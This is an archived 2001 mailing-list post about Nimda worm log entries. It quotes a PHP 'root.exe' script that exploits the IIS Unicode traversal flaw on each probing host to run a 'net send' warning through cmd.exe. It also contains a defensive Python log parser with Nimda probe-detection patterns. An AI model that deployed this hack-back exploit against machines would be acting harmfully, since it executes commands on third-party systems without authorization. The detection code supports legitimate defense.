--- "Deus, Attonbitus" <Thorat_private> wrote:

-- snip --

> 1) Recommended. Go for it and publish the IP's and let the "Gods of IP"
> sort out the damage.
> 2) A Bad Thing. These are innocent victims, and you will just have them be
> attacked by evil people.
> 3) Boring. Who cares? It's Nimda, and an everyday part of life. Deal with
> it and ignore the logs.
>
> If "1," then I was thinking of going with a "Hall of Shame" and providing
> ARIN look ups, contacts, and the whole bit. I could even allow other
> people to post logs there and stuff like that...
>
> Input appreciated.

How about another option (4. warn the infected) as proposed in this slashdot
post (text follows):

http://slashdot.org/comments.pl?sid=21830&cid=2329699

I made a PHP script, by modifying a similar one used for Code Red. First make
a "scripts" directory in your web server's root directory. Now put this into
a file called "root.exe":

<?php
/* Open a connection to the offender */
$fp = fsockopen($_SERVER['REMOTE_ADDR'], 80, $errno, $errstr, 5);

/* Check to see if the connection actually opened */
if ($fp) {
    /* URL-encode the message... */
    $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");

    /* ...and send it */
    fputs($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\n\n");

    /* close the connection (though it probably got closed automatically) */
    fclose($fp);
}

/* for fun and confusion.. answer the worm with a fake Apache 404 page */
header("HTTP/1.0 404 Not Found");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head><body>\n");
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL " . $_SERVER['SCRIPT_NAME'] . " was not found on this server.\n");
echo ("<address>Apache/1.3.20 Server at " . $_SERVER['SERVER_NAME'] . " Port " . $_SERVER['SERVER_PORT'] . "</address>\n");
echo ("</body></html>\n");

/* record who was warned and when */
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $_SERVER['REMOTE_ADDR'] . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

Then (after making sure users can access the file) try going to
http://machine/scripts/root.exe. It's going to print out the contents of that
file. You want to change that, right? Well, here's how you change that. Edit
your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever
it is) and put this type in like this:

AddType application/x-httpd-php .php .php3 .exe

Now restart Apache by issuing one of either:

/etc/rc.d/init.d/httpd restart
apachectl restart

That should do it, and you're going to have a logfile of all the people who
have been warned in /tmp/nimda.log.
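Whichever of the options above one picks, the first step is pulling the probing hosts out of the web server's own logs. The following Python script is added here as an example and is not part of this message or of the slashdot script: it parses Apache combined-format access lines (a constructed sample is embedded; the IP ranges are the reserved documentation blocks) for the Nimda request paths quoted in the post plus the other well-known traversal encodings, and aggregates them per source IP so the result can feed an ARIN/abuse-contact notification (option 4) without ever connecting back to the infected machine. Function and variable names are my own.

```python
import re
from datetime import datetime

# Constructed sample of Apache "combined" log lines (not real traffic; the
# 192.0.2.0/24 and 198.51.100.0/24 ranges are reserved for documentation).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Sep/2001:10:02:11 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
192.0.2.10 - - [19/Sep/2001:10:02:12 -0700] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
198.51.100.7 - - [19/Sep/2001:10:05:40 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
198.51.100.7 - - [19/Sep/2001:10:05:41 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
"""

# combined format: ip ident user [time] "method path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# What Nimda asks for: root.exe (the Code Red II backdoor it reuses) and
# cmd.exe reached through the overlong-UTF-8 / double-encoded traversals.
PROBE_RE = re.compile(
    r"root\.exe|cmd\.exe|%c0%af|%c0%2f|%c1%1c|%c1%9c|%255c|%252f", re.IGNORECASE)


def is_nimda_probe(path):
    """True if a request path matches a known Nimda probe pattern."""
    return PROBE_RE.search(path) is not None


def parse_line(line):
    """Return (ip, time, path) from one combined-format line, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, ts, _method, path, _status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path


def summarize_probes(lines):
    """Map each probing source IP to count, first/last seen and distinct paths.
    Unparseable lines are skipped: real access logs carry malformed requests."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_nimda_probe(rec[2]):
            continue
        ip, when, path = rec
        h = hits.setdefault(ip, {"count": 0, "first": when, "last": when, "paths": set()})
        h["count"] += 1
        h["first"] = min(h["first"], when)
        h["last"] = max(h["last"], when)
        h["paths"].add(path)
    return hits
```

Run it over the real access_log with `summarize_probes(open("/var/log/httpd/access_log"))` and feed the resulting IPs to whatever contact lookup you use; the legitimate /index.html hit from the second host is ignored, only its probe is counted.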
This archive was generated by hypermail 2b30 : Tue May 07 2002 - 13:35:46 PDT